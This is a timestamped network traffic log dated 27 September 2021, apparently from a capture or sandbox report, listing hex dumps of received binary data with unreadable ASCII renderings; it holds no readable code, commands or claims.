                                        2021-09-27 17:14:38 UTC185INData Raw: bb cb ef 39 50 fe ab 39 5d fe a1 1f 63 69 71 e4 ee f3 82 34 a7 11 c9 70 df c0 3d 29 45 77 9a 00 5d d6 15 07 89 c1 dd 82 0c 22 ea 0d 20 fa de 67 11 a6 4d 4f eb 61 e6 25 e3 41 17 84 09 53 f1 dd 2e 43 53 83 94 9c b9 fa 45 8a d8 3f 76 69 e2 d8 c4 5f 2b 91 ae 90 cf 38 15 f5 c6 af ea 9c d9 cd ed 3b cf c7 e6 db 56 73 f6 43 61 3a 8e 0e 02 91 38 6a c6 de 0b 36 00 a9 4d 75 39 71 c7 7c 68 8c fa d7 5a 9e b9 e3 50 9b fd 98 b9 b2 41 97 85 54 a3 a5 f3 a7 4a 2c b3 b0 07 e8 66 f1 1a 89 89 71 b0 79 ff ce 62 19 3d 15 2d 77 f7 a8 e1 e2 06 54 9c 0f b5 bf b7 5a 7f 64 cd c2 4c 0a 36 0c 6e d8 1c c2 b4 43 9c 59 1a f3 de 29 f6 a6 df 67 82 8b d8 fb e4 29 f9 63 c4 ba 8b 30 c8 39 63 1b fe 7c 75 e9 45 5d b2 f9 06 02 67 a6 bd 71 33 59 46 37 ea bb 08 c6 3e 2a c8 6b 65 b6 3d f4 13 23 88
                                        Data Ascii: 9P9]ciq4p=)Ew]" gMOa%AS.CSE?vi_+8;VsCa:8j6Mu9q|hZPATJ,fqyb=-wTZdL6nCY)g)c09c|uE]gq3YF7>*ke=#
                                        2021-09-27 17:14:38 UTC187INData Raw: b8 ec 75 c6 46 a9 58 09 c6 46 df 70 0f 9f d9 c8 4b 86 76 ef c0 a2 f1 3b 34 5b 5c 1e 50 ff 32 7b 18 70 26 10 ad e6 63 2b 71 05 9b 44 24 6f 0b 0e 79 62 a5 e0 33 5b 31 33 da 14 41 e4 3c 26 2b 37 6d 23 50 d6 9c de f6 12 b2 dd ef 30 93 6a 5f af 7f 5d bd a3 7d e7 58 b7 41 7c 3e 2b 5c 65 00 3d cb 12 1e 3b 60 07 c0 b1 fd 6d 36 06 c2 8e a7 a9 cc 9c 22 2b e0 38 66 1a 6d 0b f0 e5 c3 38 d9 db b7 0c bc b1 df 01 2a 11 51 26 f2 ad 53 94 93 a7 09 cd a7 3e d1 65 1c 92 7c a5 e8 61 cb ce 25 76 8a 2c 56 58 67 ed ff ae 6b c5 03 a7 21 96 a6 63 a8 60 14 a3 fe 1a 9a 41 33 d7 e5 32 20 7f 8a 61 d8 ce bc 06 53 ab 07 66 f9 78 41 a0 b8 d3 c4 19 80 b1 d9 5d 1f 49 b7 84 f9 8d 03 36 18 11 16 70 68 db 78 d7 f1 19 12 62 ab 18 3f 89 d8 2e b0 f5 f3 bb 44 f5 4f df 30 2c fd 88 ba 82 ee 35 55
                                        Data Ascii: uFXFpKv;4[\P2{p&c+qD$oyb3[13A<&+7m#P0j_]}XA|>+\e=;`m6"+8fm8*Q&S>e|a%v,VXgk!c`A32 aSfxA]I6phxb?.DO0,5U
                                        2021-09-27 17:14:38 UTC188INData Raw: 95 1c 4c e4 9d e0 5c 2c f4 7c da 9f 06 8f a4 9f 30 cd c0 d7 97 76 ad 32 43 77 41 fd 2a 3b f6 3a c9 69 72 db 17 0a 09 ff d5 da ae 67 45 08 43 1a cd 09 00 7a 4a 8e 2f 30 c3 62 ed 75 47 e0 d7 c5 6c c6 7f 25 b0 79 36 b1 4e 61 a1 2b e1 d1 8f ea 70 34 08 22 18 cb d2 27 e6 dc 37 c3 8a a4 40 c5 a1 2d 6b 00 f9 9e 23 9d a6 b3 4f e3 ed 83 62 a9 b4 9e 71 b1 e0 df ca 32 63 78 49 a0 be a5 33 b9 39 e6 00 4c 7d 0c 24 2d 5c 81 89 7e d1 3a 21 f3 02 85 35 81 92 30 c3 1d 4c bb 0f e9 2e 30 ab 1a 12 00 6e 7d 11 df d9 3c fb 8a 9c fa c4 c2 4c 6b 11 05 1c c2 8d a1 52 5b d7 a4 93 db 46 73 5f f7 1a 11 3c 08 9b d1 59 f3 39 81 b6 f8 39 6a 84 83 62 29 67 12 ce a6 f0 c9 72 e3 04 85 d9 77 8c 01 f3 51 d4 86 a1 35 c1 92 49 eb e5 f1 d8 77 91 e8 46 58 53 f5 3b 4e 46 3c 9f 52 bb 6b 4e 37 40
                                        Data Ascii: L\,|0v2CwA*;:irgECzJ/0buGl%y6Na+p4"'7@-k#Obq2cxI39L}$-\~:!50L.0n}<LkR[Fs_<Y99jb)grwQ5IwFXS;NF<RkN7@
                                        2021-09-27 17:14:38 UTC189INData Raw: bc 34 b2 43 cf e8 b1 bc ad ec e6 1f 98 35 b7 8d 4c 2b 07 6d 1a ed 6d 0c 56 17 61 dc 96 f0 b4 12 63 31 0b 89 36 8d 41 67 8b 16 0d 45 84 9f 42 f4 43 27 66 69 d4 f8 5c d7 07 20 ed b6 d8 13 89 51 9e 2b 99 dd cc 7a ac 52 e9 eb 3c c3 0f 16 10 50 3c c1 2b 2e 12 51 f0 60 2f 93 50 81 db 17 52 2a 71 4e eb d8 c0 96 50 cb e5 83 c6 90 9a 6c 8f 30 bc 08 97 74 54 8a bd 4d bd d3 2a 89 85 04 e9 ff f7 d9 bb 54 69 29 7f ea ca a6 06 94 13 fc 6c dc b4 50 e4 3c 71 4d 0f 1c b9 16 48 4e 79 9c c6 45 1f 38 0f 7f de f2 f5 ea 5d cd 5d b2 c2 4f 2f a7 a2 69 62 13 8b 61 fd de 0e ad 7c e5 bb b1 14 28 3d 42 1a 55 55 70 e9 8c 5b 7f e7 3e 02 46 a7 47 47 31 47 67 36 10 8d 02 df c7 2a d0 5c ae b7 9c f2 29 16 8b c2 c4 18 a5 5d 83 c4 8d 7c dc eb 63 93 57 c7 85 76 e0 68 9b e0 75 81 6a 47 89 9d
                                        Data Ascii: 4C5L+mmVac16AgEBC'fi\ Q+zR<P<+.Q`/PR*qNPl0tTM*Ti)lP<qMHNyE8]]O/iba|(=BUUp[>FGG1Gg6*\)]|cWvhujG
                                        2021-09-27 17:14:38 UTC191INData Raw: 75 8e 68 1d f5 54 f5 ab cb d7 67 17 a1 46 94 18 34 50 ff 32 b2 6b f1 8f 1d d9 e9 ab e5 cc 8f ca 6b 13 dd 3e ca d6 a9 f2 7d e9 47 d7 ae 74 41 82 f1 27 dd ce 93 35 9c f6 0a 59 87 49 2e fa 85 1b 79 3a 28 b1 ae 76 1c 65 99 52 a5 da a1 e9 c0 1b a1 23 dc 1f e0 f8 5e 2e 5f f1 23 e9 ab 50 bc 37 21 51 cc 91 e0 43 c4 85 f5 1e 12 88 c3 a9 80 ad b3 02 4d 11 56 57 3b ae d6 e8 71 0e f6 4b 4b d0 8d d8 f4 46 83 ab 08 93 65 2e ff 4b 89 f9 ff 37 66 b7 8f 2e 6e b4 28 3e 86 39 31 db 4e 7c fe c2 14 74 6e 00 5a ad 51 f3 1e 49 88 ef 0b 3b 5a e6 b2 f2 b4 dd 34 be 95 1b 8a 58 61 24 bc 1b 63 60 1a 8b 81 b6 c2 17 e8 eb 97 6e 8b 7a 55 cd 4b b1 34 f4 1b 8e 19 6b 25 2f a5 71 33 23 58 b9 c9 81 6e 2e df 5c 83 a6 5f 02 fc af 1f 72 ff 71 30 fa 15 95 49 9b 9b 9e 72 c6 c0 01 bd 4b b4 b6 e6
                                        Data Ascii: uhTgF4P2kk>}GtA'5YI.y:(veR#^._#P7!QCMVW;qKKFe.K7f.n(>91N|tnZQI;Z4Xa$c`nzUK4k%/q3#Xn.\_rq0IrK
                                        2021-09-27 17:14:38 UTC192INData Raw: cc 33 15 c0 a7 d0 48 6b e1 12 b7 26 6e 91 eb fd c5 64 21 02 20 a8 1b 13 43 53 b4 6a 22 d0 2b f4 c5 15 5d f8 94 2d 7b fa 98 9f 28 77 d4 e4 ac 80 7a a0 1c 5b 38 51 65 49 6d fd 10 cb 4e ff 4c c0 22 ab e5 01 ff 84 3c 78 51 e0 2e 11 23 89 22 0b d2 dd 8b b2 93 f0 68 5d 69 f9 ec 8e ad 83 47 a9 09 a4 f7 db 85 d9 f7 29 6f b2 cd fa 47 18 d8 45 33 71 59 60 6d 98 58 4f 1a 91 08 2f 09 3f b5 08 d1 e2 24 d8 2c 15 38 42 66 62 f9 de c2 ab ae 1e 76 81 f6 60 a7 d1 a6 59 10 4d 56 4a 5f 96 07 20 0e ee 48 90 46 b4 3b 93 9b 44 cb 73 33 74 08 a3 70 78 a6 94 aa 03 f0 55 02 a5 97 eb d6 b5 4c 17 34 20 45 b6 c1 0b 18 f4 19 9b 65 e2 03 1a 06 f9 96 83 16 a1 89 3d d0 68 04 27 ea 65 ac 8d b2 82 7d 7e 96 78 28 47 10 e9 18 c2 f8 43 9b a2 a4 07 0f 20 07 b5 eb a7 a2 66 ee 00 7c 27 46 cb fc
                                        Data Ascii: 3Hk&nd! CSj"+]-{(wz[8QeImNL"<xQ.#"h]iG)oGE3qY`mXO/?$,8Bfbv`YMVJ_ HF;Ds3tpxUL4 Ee=h'e}~x(GC f|'F
                                        2021-09-27 17:14:38 UTC193INData Raw: e6 be e3 b6 16 74 0b 21 f1 30 71 56 53 8c 94 08 b9 f9 42 7d da 40 76 19 82 c9 c4 5e 2b 78 ae e4 cd dc 17 96 c7 8a 8a 9f d9 d2 ec b8 cf ec ef 1d 55 19 f6 10 01 19 8f 19 02 05 38 d6 c5 21 09 4a 00 fe 2c 6e 39 73 c7 c9 71 d7 df 50 5a c6 b8 f8 50 98 fd af 99 ad 41 97 85 73 a2 a8 e3 a4 4a 04 b2 bf 17 e8 66 d8 1b 86 99 70 b0 53 fe ff 72 1c 3d 3e 2c 56 d7 aa e1 cc 07 77 bc 0c b5 90 b6 78 5f 67 cd f2 4d 2e 16 0f 6e e9 1d f7 a4 43 9c 6b 1b d7 fe 2a f6 95 de 40 a2 8d d8 cf e5 02 f9 61 c4 8f 8a 18 e8 3f 63 2d ff 55 55 ec 45 6a b3 c2 16 03 67 9e bc 4c 23 5b 46 0e eb 86 18 c0 3e 10 c9 54 75 b4 3d cf 12 1c 98 c0 ad 24 f9 5f f6 d8 7c 41 6a d5 19 8c 93 f9 be 60 f3 69 2a de cd bc 23 44 4d dd 70 7c 65 f4 ed 9a 09 33 c9 ac 96 76 6f c4 9c 9c 6f ea 09 51 cb 47 cc 6a 14 d9 a6
                                        Data Ascii: t!0qVSB}@v^+xU8!J,n9sqPZPAsJfpSr=>,Vwx_gM.nCk*@a?c-UUEjgL#[F>Tu=$_|Aj`i*#DMp|e3vooQGj
                                        2021-09-27 17:14:38 UTC194INData Raw: ff 31 34 47 15 d9 49 c5 80 e4 72 51 d9 b9 a6 28 ad e1 ff 0f ab 42 b4 bc c3 ac 82 74 b4 95 45 74 1d 33 1b e7 6c 4f 4b 98 67 ac b4 b9 b3 77 65 64 29 41 36 a0 46 79 8b a5 00 fc 8f 51 7c fd 52 0f 75 cc c9 5a 4b 83 13 18 e3 09 ca c5 9c 1a 8b 78 8a d1 d8 82 b6 b2 f5 63 23 44 2e cd 31 41 18 b5 2d 05 23 a8 d1 6e 10 b8 63 d5 f5 36 5e 92 58 f7 c6 13 e0 df 50 7f e3 6c c3 52 9a bd 88 bf b0 58 8a 80 54 e7 b4 84 a6 0e 20 b2 a0 54 e8 0d f1 7d 98 98 72 f3 78 92 de 7a 1b 3c 15 2d 76 ae a8 ba d3 04 54 bc 0c ce bf 2a 6b 5d 65 8b c3 31 0b d7 18 6c d8 1c d3 db 41 34 49 18 f0 fe 2a 77 a6 10 55 a0 8f d8 fa 67 2b c5 47 c3 ba 8b 30 6d 3d c7 2a f9 7e 16 ec c2 5d 43 ee 14 01 24 a7 34 61 28 6a 45 37 a9 aa 93 c2 a6 1b cb 7b 75 b4 8e f4 cb 39 90 c2 ee 19 4d 6e 75 d8 7d 7c 6b e5 d8 8e
                                        Data Ascii: 14GIrQ(BtEt3lOKgwed)A6FyQ|RuZKxc#D.1A-#nc6^XPlRXT T}rxz<-vT*k]e1lA4I*wUg+G0m=*~]C$4a(jE7{u9Mnu}|k
                                        2021-09-27 17:14:38 UTC195INData Raw: fe 94 c8 01 61 03 3e d2 eb a4 c5 7c 80 23 45 65 46 7b b9 49 b7 76 99 ed 53 7e 96 72 a9 a2 76 4f ba 4b d1 41 dc 8f 29 77 f7 1d f8 c0 ca 00 50 7c ed 34 ff 41 fc 66 60 82 70 c2 cd 8a 00 d4 b2 a5 f3 39 f6 25 c2 e8 6e 3a bb 48 16 0f c2 5b 0d 2f 49 3f 9c 88 59 04 db 22 b6 85 ca d8 81 74 b7 85 97 ae a7 8c 45 6b 1c f0 4a 27 bb 0e d7 e6 42 81 d9 bc a0 92 83 da a4 93 7d 6d b7 3e ea b5 d9 37 29 de 27 65 74 f6 de b4 15 1d 91 2b 43 82 e9 cb b3 6f f6 df 42 38 17 2f 9b b6 c9 0f 90 54 0a 40 e3 cd 07 cb 68 15 e8 be 34 f4 0d 37 8a a5 10 40 29 8e 06 98 7a d5 5e 57 ca 47 09 8b 1a 45 e3 f8 98 97 7e 84 d4 99 8a 49 22 b3 db b9 62 73 59 1c e8 55 c5 2b a4 3d d5 f3 ce 58 55 ec 3a 3e 5c 8e 13 f1 7f f3 60 2d ad 0c 55 30 10 b3 c1 da 08 ee bd 11 83 c8 1c 02 98 e2 1f 06 bc 71 56 ab 15
                                        Data Ascii: a>|#EeF{IvS~rvOKA)wP|4Af`p9%n:H[/I?Y"tEkJ'B}m>7)'et+CoB8/T@h47@)z^WGE~I"bsYU+=XU:>\`-U0qV
                                        2021-09-27 17:14:38 UTC196INData Raw: ac e8 ff 58 0b b6 e4 ca 6f eb 50 66 88 1d cc 6a 4d e0 e3 9b 48 30 b9 32 f1 55 6e 9c b3 bd a5 17 21 25 78 e8 79 58 43 2a ec 0a 46 9b 2b 8f 9d 75 3b 8b 94 2a 22 7a da ed 28 76 8d 44 e8 f2 7a a3 45 9b 7e 23 65 44 34 3d 70 81 4e 80 15 20 40 d9 e5 20 a6 84 5b 32 51 9b 77 11 46 fb 22 0c 88 fe ca 33 98 f1 32 7d 2f b8 ee 8d f7 42 03 18 09 f6 af 3a e7 68 f7 63 37 51 aa 7b 4c 39 82 86 53 80 4b 43 37 31 38 66 0d f5 6f 92 51 3a c3 67 a6 6e 7c f4 3b 65 5f 3f 31 67 8f b1 b5 8d fb c2 76 86 97 44 e8 7b b4 58 71 8d 04 38 52 95 66 a0 7b 2c 5a 16 07 14 68 51 89 fd 8a 7c 50 58 00 d6 11 2f cb e6 aa 05 99 40 65 a4 9f 9a b7 40 23 69 40 87 09 c8 b5 92 10 a6 7c f1 33 89 62 39 6f c8 c6 a6 71 e6 ec 09 ac 3a 60 7d 82 28 cd 93 fc dc 09 2f fd 2f 4d 3a 6d 92 79 a8 90 0e cb 87 c3 22 6a
                                        Data Ascii: XoPfjMH02Un!%xyXC*F+u;*"z(vDzE~#eD4=pN @ [2QwF"32}/B:hc7Q{L9SKC718foQ:gn|;e_?1gvD{Xq8Rf{,ZhQ|PX/@e@#i@|3b9oq:`}(//M:my"j
                                        2021-09-27 17:14:38 UTC198INData Raw: 0c d2 8f 45 61 6e b3 77 58 00 73 2a 8e 61 b5 d6 8d d0 5b 07 78 5d 90 56 14 41 1e e2 fd 66 f4 e1 31 1f bb 25 13 67 c3 be a0 0d 4a 69 c9 92 cd 9d 65 ed a2 fa e4 ea b0 ac 81 ee ae 8d 87 58 54 4b 98 75 48 56 f8 61 69 62 38 b6 a1 5f 60 25 49 b3 5b 18 52 14 c7 aa 15 b8 9a 3f 2c 8a cb 8c 3e f7 98 e7 ec e6 20 e4 ec 35 c1 d9 86 a6 03 69 dd d5 7a 8c 14 90 78 f5 fc 72 f9 3d 96 ad 02 72 4e 74 4f 1b b2 a8 a8 b1 63 26 d5 6c d9 d6 cd 3a 3d 09 a8 c2 18 64 52 61 1b ba 70 b7 a4 26 f9 2d 45 b8 9f 45 92 ca ba 67 f0 fa b6 8f 8d 46 9c 26 ad df e7 55 a0 5c 0d 7f 92 1b 55 be 24 3b d7 a1 77 6f 03 ca d8 61 71 2f 28 43 83 c6 7d 96 47 5a ad 33 14 db 59 98 76 33 ca a7 c1 7d 99 1d 93 91 1d 12 0f 88 7c 8e d0 b5 da 32 87 0d 62 80 a2 eb 4f 23 4d da 14 3d 31 8c 9d be 4e 74 a6 c3 de 55 00
                                        Data Ascii: EanwXs*a[x]VAf1%gJieXTKuHVaib8_`%I[R?,> 5izxr=rNtOc&l:=dRap&-EEgF&U\U$;woaq/(C}GZ3Yv3}|2bO#M=1NtU
                                        2021-09-27 17:14:38 UTC199INData Raw: 3c fd f7 56 43 9c 62 f2 1b 85 f5 71 5e ae 55 af 81 e5 2d 13 7f bd 74 ac 6c f2 25 20 c5 11 90 e9 e1 23 95 80 fc 9d 2d f6 51 da d8 4e 2e e6 3b 5a 2d c3 4c 1d 43 6f 6d f3 b9 7d 04 dc 0a c5 b1 e4 ab a1 35 e3 b1 af fe 81 bf 36 46 5d a2 4e 10 de 1e e5 83 21 83 ab bd 80 e6 a1 bf 9d ab 7e 7d ab 31 ee 80 c4 1f 29 fc 23 6f 70 c3 bb d2 13 78 82 21 26 93 ca a4 95 78 e6 da 59 35 16 27 fe ba c3 00 8b 49 15 63 e5 cb 1f d6 48 77 c6 99 67 c3 2e 43 ab e7 54 60 07 eb 34 bf 7a f5 79 23 dd 46 68 84 0f 37 e8 ce fd f4 68 ec c2 be eb 48 33 c7 dc 8f 0b 77 5a 68 f4 65 ac 01 9c 08 f3 f3 df 4f 14 fb 11 4c 7d ac 77 f5 48 87 54 07 cf 3e 62 55 58 b3 ae d6 3b 87 b3 37 f1 ec 3a 6c 99 d3 7e 17 9a 15 71 9c 61 f2 20 c5 ec e2 17 df 87 48 d6 21 f5 ef 92 2d c2 77 d8 a2 a6 dd ca 69 d8 9a 0e 42
                                        Data Ascii: <VCbq^U-tl% #-QN.;Z-LCom}56F]N!~}1)#opx!&xY5'IcHwg.CT`4zy#Fh7hH3wZheOL}wHT>bUX;7:l~qa H!-wiB
                                        2021-09-27 17:14:38 UTC200INData Raw: a0 8a ee b0 3d 48 29 47 e8 5e 6f 34 20 d8 65 42 a7 78 9d b7 1c 32 b4 94 2f 1e 0e c9 c6 41 44 b5 30 c8 fb 08 8a 7a f2 55 1f 36 78 1f 54 7f bf 4e a1 23 4d 53 e1 97 21 ac f0 4c 02 3f 9a 2e 45 4e f1 56 3c bb 90 ee 69 df d0 1c 2e 1e 90 87 a5 ca 42 17 37 6b cd 81 48 ef 5c 90 01 3e 28 ba 55 29 30 f6 c2 44 bb 3c 4c 03 56 5f 68 62 c7 46 89 60 2b a2 5f bc 47 4c c5 5c 16 5d 2e 1a 4e 8b b3 a1 8a c8 f8 3a ab 91 44 d8 7f c0 43 75 e3 20 3b 3e b6 4b cf 5b 4d 3d 3b 12 4b 44 43 ee 9f a9 14 33 7a 68 b2 34 47 ae c2 c2 63 be 28 02 82 f7 f2 9e 28 44 6d 5c d8 2f c1 c1 be 71 a1 7a ed 6c a9 6b 4d 6b a0 96 b2 76 92 ee 02 d8 38 61 4d bc 0c cd e0 c8 ce 12 12 fb 0d 49 2a 71 d6 5b b3 9c 7e ee 81 c9 00 6e 04 67 e4 ad 9c df 46 86 57 39 32 32 5b f4 6f 91 51 8e e9 19 2e c3 07 e8 fb 51 60
                                        Data Ascii: =H)G^o4 eBx2/AD0zU6xTN#MS!L?.ENV<i.B7kH\>(U)0D<LV_hbF`+_GL\].N:DCu ;>K[M=;KDC3zh4Gc((Dm\/qzlkMkv8aMI*q[~ngFW922[oQ.Q`
                                        2021-09-27 17:14:38 UTC201INData Raw: e2 e6 6b d4 84 25 09 ae 1d 21 37 e3 a8 a5 32 2b 60 cb 83 92 8e 76 fa a7 f2 8a fc b4 cd 8e c0 cf 8a 82 3d 33 6b 82 4e 48 4c eb 63 02 74 5d 80 9b 71 7d 2e 6d dd 7b 16 4c 1d b3 aa 15 b8 96 25 3f 8e b9 84 35 ee a2 cf f1 dc 24 c5 fc 27 d7 d0 8e a6 05 5c d6 d2 76 9d 0f 9f 7d ca e0 01 c4 1c 92 de 14 70 3d 72 40 77 84 d1 8c 8f 63 20 ce 64 d6 fe db 3c 30 17 a4 b6 24 66 16 46 0f ab 74 93 c8 26 f3 2b 73 84 96 46 f6 ea 8b 15 cb e2 d8 a9 85 45 9d 0f a9 ba c2 72 9a 44 13 6f 91 2a 27 8c 2b 2e d4 86 64 6c 67 e3 d3 14 4e 5a 04 59 ea e8 76 c2 7a 44 c8 3e 1b b5 7b 9a 13 74 f6 c2 e5 76 f8 3a 99 9b 13 13 07 81 78 e0 93 8e cc 1f 9a 1c 5e 8d a9 ca 4d 22 24 fc 1f 49 07 9b ed b8 66 06 ad c0 96 78 0b 9d 9c fa 0a dd 57 35 a8 37 a9 4b 7b e0 e5 ac 38 0f a7 40 d9 60 3d b7 99 d8 a1 21
                                        Data Ascii: k%!72+`v=3kNHLct]q}.m{L%?5$'\v}p=r@wc d<0$fFt&+sFErDo*'+.dlgNZYvzD>{tv:x^M"$IfxW57K{8@`=!
                                        2021-09-27 17:14:38 UTC203INData Raw: 11 cd 23 96 fe c7 2f 89 9e 93 b6 30 e5 38 ef d2 54 7c d0 3c 58 2b c3 58 3b 2c 41 71 fd b8 71 77 f7 0d b6 93 fe b6 c4 52 d2 b7 89 ed 94 bf 29 68 38 89 6f 09 cc 02 96 81 44 b4 86 8b 89 fb a2 cb 9b bb 6b 4d ad 25 e1 f3 d7 3e 38 cf 07 64 65 fc bb ab 10 72 81 04 43 b9 c7 a8 9f 6f f6 da 45 21 16 26 91 88 c9 69 bd 49 67 62 f8 a4 2c ca 29 50 c5 fc 72 d8 4f 70 a1 e7 58 6a 6b cd 2f b7 0a f3 6e 32 d6 6a 09 a9 37 35 f8 ee f7 f4 5d eb b0 b9 e5 2c 03 dc bd 9f 0d 14 7e 73 80 70 a0 17 b6 35 f8 95 e3 1b 1c c2 18 59 7d 8e 7c d0 59 90 6f 00 cb 24 16 76 31 95 ad df 02 80 b9 3d 83 ed 36 6e 99 e8 71 05 90 71 73 9d 79 f4 3c d5 fc df 1c b9 af 3d f9 2c d8 fe b0 3a d9 66 c4 b9 ad 94 ec 6a db ea 02 42 68 8a 7f 63 1e 7b 22 85 28 88 d5 8c b4 45 07 79 47 90 5d 18 3b 32 f7 fd 65 d7 cd
                                        Data Ascii: #/08T|<X+X;,AqqwR)h8oDkM%>8derCoE!&iIgb,)PrOpXjk/n2j75],~sp5Y}|Yo$v1=6nqqsy<=,:fjBhc{"(EyG];2e
                                        2021-09-27 17:14:38 UTC204INData Raw: f6 db 5a 32 97 36 c8 ca 0e 80 4c e9 56 10 00 6f 19 78 63 aa 21 90 4c 63 4f e5 84 36 af f6 51 01 34 9e 5a 54 53 d0 4d 3c d2 ad ec 1d c8 c7 07 17 0f 81 9a 8e df 30 2b 30 09 ed 9a 59 ed 57 83 44 1f 23 a6 53 4c 3a bd f2 69 94 3e 48 0f 54 2d 78 68 f1 63 8b 6f 20 f1 6e a3 6a 51 ca 4f 79 48 4b 27 54 80 a8 ad 8d d6 fc 02 ab 84 44 e6 7b da 7d 77 e8 2c 3c 3c a7 48 c2 56 28 39 2a 23 7a 7c 5d ec ed 8a 08 5c 4b 00 f5 15 5b eb e9 df 0e 9d 32 63 b1 f0 80 d6 01 27 78 5d ae 2c dd ae 81 10 fb 7a f1 03 bf 03 63 6d ab e2 bb 6c 92 c4 05 b6 36 70 56 91 5c ef e1 de d8 09 05 db 20 4b 2b 60 a6 6c b3 83 0e d8 87 c9 29 7b 12 4a 8a 88 82 d3 45 9a 38 06 53 14 56 95 6c bd 4b a5 fc 15 39 a0 3b f2 c9 47 7e fe 45 fe 1c a2 c2 73 46 91 44 be f5 eb 27 09 62 94 68 bc 1e ba 13 27 b5 05 86 8b
                                        Data Ascii: Z26LVoxc!LcO6Q4ZTSM<0+0YWD#SL:i>HT-xhco njQOyHK'TD{}w,<<HV(9*#z|]\K[2c'x],zcml6pV\ K+`l){JE8SVlK9;G~EsFD'bh'
                                        2021-09-27 17:14:38 UTC205INData Raw: b7 be ed ff aa 89 8a 45 1b 7e 82 78 6e 56 fd 0e 65 62 4c ab 83 4a 66 3e 70 ae 2d 10 5c 05 98 ae 18 ad ad 22 5a a4 dc 97 13 f2 9c fb eb b0 06 f3 f1 1d ce d4 84 c3 0f 42 d0 cf 73 8c 14 82 1a ca e0 01 c4 1c 92 f0 26 74 50 70 5f 04 d7 fa 94 8c 72 3d d1 68 fd da db 2b 3a 17 be c2 2b 6e 62 51 0f bc 6a b3 ca 22 f9 3d 4a 91 8c 4a 9b c3 ab 02 d0 fc d8 88 81 5f a6 01 a0 cc ea 5f 8b 58 07 4b 9f 0c 34 80 20 29 d7 9b 65 01 22 c8 de 0e 47 3f 34 67 8b d9 79 af 5b 5e ad 09 06 b5 72 84 76 41 f9 b6 c2 6a 8b 6e bb b8 12 1d 0c 81 74 eb fd b3 fc 3f 92 1b 59 e1 8f e0 4d 22 24 e9 18 26 0b 94 81 98 67 6b b9 cf e4 51 21 91 f6 f8 0c dd 44 03 b8 36 cc 68 7c 8c c3 82 2b 15 84 41 c5 0d 09 b1 9f e2 97 3a 42 24 45 9b 69 00 04 2b c0 49 56 b1 59 8c ab 01 0c a1 fb 0b 1e 09 ea b4 61 62 95
                                        Data Ascii: E~xnVebLJf>p-\"ZBs&tPp_r=h+:+nbQj"=JJ__XK4 )e"G?4gy[^rvAjnt?YM"$&gkQ!D6h|+A:B$Ei+IVYab
                                        2021-09-27 17:14:38 UTC207INData Raw: 66 f9 be 47 48 f7 00 d7 ad ce b6 a0 65 d8 aa b8 da e0 aa 20 57 02 b3 44 13 d5 18 96 81 44 b4 86 8c 88 f1 af fc bf ab 7c 7d c2 15 ea 87 f3 33 2d e2 05 67 64 d9 aa d2 11 73 92 2b 20 89 cd bb 80 0a c0 ec 4a 3d 0c 03 9d 9c c2 19 8b 26 25 62 e5 dd 18 d1 6d 70 c9 8e 4d c7 3b 37 8c a4 62 7c 1b fa 05 b4 19 e0 65 27 f6 05 5d 82 2a 20 e0 de cb 80 5d f6 c4 db c9 43 0e c5 d8 89 16 14 7c 79 f4 48 95 0c 9b 08 96 80 e9 6f 0a ff 16 4c 6c cd 74 d1 48 ac 6f 00 d9 2e 64 5e 39 9c 92 de 39 98 ba 20 d3 c4 2d 76 fc d2 7a 17 a0 38 5e 9c 70 f2 27 c6 f5 c5 17 ad b6 58 cd 15 db e9 92 5f f8 7a df a2 c3 ba e7 78 eb 9a 2a 55 68 dc 69 74 19 4d 3d 84 13 92 b3 a5 c0 66 35 6e 4c a3 54 00 34 36 f0 e0 0a f1 f0 36 1c 8d 27 14 35 e7 ab b1 3a 58 73 ae af a0 b2 59 e7 a2 fa c6 f7 aa b9 ed ca aa
                                        Data Ascii: fGHe WDD|}3-gds+ J=&%bmpM;7b|e']* ]C|yHoLltHo.d^99 -vz8^p'X_zx*UhitM=f5nLT466'5:XsY
                                        2021-09-27 17:14:38 UTC208INData Raw: 37 96 e7 5f 07 1c 98 43 7e 53 db 22 0d a0 9b e8 1d fd f1 01 0f 0f 81 9a a4 df 3b 44 25 6c ca aa 68 e3 55 9e 72 19 23 b0 21 2b 38 ac d9 75 bb 3b 44 0e 58 2b 45 0d c3 7f 87 62 25 d6 72 d3 64 53 f4 7e 67 4f 2a 02 78 9a a4 c0 87 d4 c2 3f aa 93 35 de 7b d8 75 64 f4 41 3e 37 a7 58 d0 4e 24 35 2c 0f 60 70 30 fa fa 9f 23 43 4b 69 dd 02 46 da fe aa 30 81 33 76 a0 f2 dc 85 25 27 79 46 b1 39 d0 c1 ba 63 9b 6c e9 00 82 71 08 63 b8 e2 ad 1e d0 ca 18 a1 2f 70 7e 86 28 fc e1 d4 c9 18 12 eb 3c 28 1b 5a a4 61 ac 85 5d fe 81 fc 3a 60 07 6a 96 9f 89 aa 46 8b 23 2b 03 34 5c 8c 71 f4 6c 86 c9 03 1b d2 1d e4 e3 33 4f 92 61 e7 1a 9e d7 6c 56 92 42 a3 8d f5 42 3b 54 b0 62 9a 15 c9 25 31 d8 16 87 e4 cb 3f e6 b7 f6 87 0e e1 3e e5 c4 3a 2e e6 2f 43 31 d9 4d 01 13 5e 6e e4 b3 18 46
                                        Data Ascii: 7_C~S";D%lhUr#!+8u;DX+Eb%rdS~gO*x?5{udA>7XN$5,`p0#CKiF03v%'yF9clqc/p~(<(Za]:`jF#+4\ql3OalVBB;Tb%1?>:./C1M^nF
                                        2021-09-27 17:14:38 UTC209INData Raw: 76 31 74 e7 ed 62 4c 0e 54 7a e3 ab 63 85 9c dd 88 99 a2 c1 43 96 53 ab a7 63 6b 58 ac 62 b2 97 3c 7b f4 08 19 68 7a ac 71 fc fe 72 17 37 35 2e 76 d9 b9 61 17 17 d4 45 09 b5 be bf 47 58 45 ce ca 51 0e 1e 06 69 f8 1f d3 b9 44 94 51 1f f0 fc 2a f8 a8 da 60 a0 9d 85 f3 e1 2b f8 72 a1 b4 98 36 e1 33 71 9a ff 70 47 6c 40 53 bc e7 04 80 6e b4 3c 70 26 7a 46 25 6b a6 1d e2 3e 38 49 6a 70 95 3d e6 92 26 9c e2 ac 04 f6 6d d6 d9 7e 7f 4b e4 12 8a 93 c6 b2 4f f7 68 2b ec c1 8a 23 44 40 90 79 4d 65 f4 e3 d6 0d 06 c8 a0 87 1c 61 f4 9b 95 61 b4 1a 03 d9 20 de 47 1d fd b4 a6 4c 76 e1 20 d3 0b 6e d5 f6 af a1 41 2a 40 24 f5 08 81 66 5c 35 2f 2b cb 2e c9 c5 64 dd fa 9d 68 79 78 88 35 01 23 55 6d ab ab 7a f8 0e 1a 1c 72 65 0d 7f bc 34 ca cf cf 48 27 